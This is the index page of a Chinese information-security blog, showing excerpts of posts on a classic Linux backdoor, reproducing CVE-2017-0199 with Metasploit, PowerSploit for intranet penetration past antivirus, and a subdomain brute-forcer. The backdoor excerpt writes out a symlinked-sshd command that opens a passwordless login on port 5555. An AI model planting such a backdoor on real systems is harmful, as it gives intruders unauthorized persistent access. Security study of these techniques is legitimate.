终于明白' blog|关注信息安全-Try to make you laugh but lost the cry for you

终于明白' blog|关注信息安全

欢迎光临
一直在努力

【东京不太热】 Linux经典后门的探究

今天在搜索关于Linux下的后门姿势时,发现一条命令如下: 软链接后门: Default 1 ln –sf /usr/sbin/sshd /tmp/su; /tmp/su –oPort=5555; 经典后门。直接对s...

最新发布

部分文章收集整理,涉及版权利益请联系删除 ⊙﹏⊙‖
CVE-2017-0199 Office复现-终于明白' blog|关注信息安全
安全工具

CVE-2017-0199 Office复现

在kali下执行。 首先更新msf到最新。(假设你们都完成了这个过程) 下载利用脚本 Default 1 2 3 [email protected]:/usr/share/metasploit–framework/modules/exploit...

Powersploit在内网渗透中的使用-终于明白' blog|关注信息安全
Web安全

Powersploit在内网渗透中的使用

内网环境下,我们用metasploit生成一个payload,万一运气稍微好点的,碰到了像360这些东西,我等小白是一脸懵的,这种情况下,就可以想powershell,总不会杀软连这个都要杀吧。 总之powershell + metaspl...

子域名爆破工具 – 啸天犬-终于明白' blog|关注信息安全
Web安全

子域名爆破工具 – 啸天犬

爆破子域名工具在国内外有很多,但是有很多子域名爆破的工具却忽略了一点,就是爆破前没有做过域传送检测。如果爆破前存在域传送漏洞这样爆破就可以省咧了。于是作者就开发了一款名叫 啸天犬的工具–主要偏向于域名收集。 项目下载地址:https://g...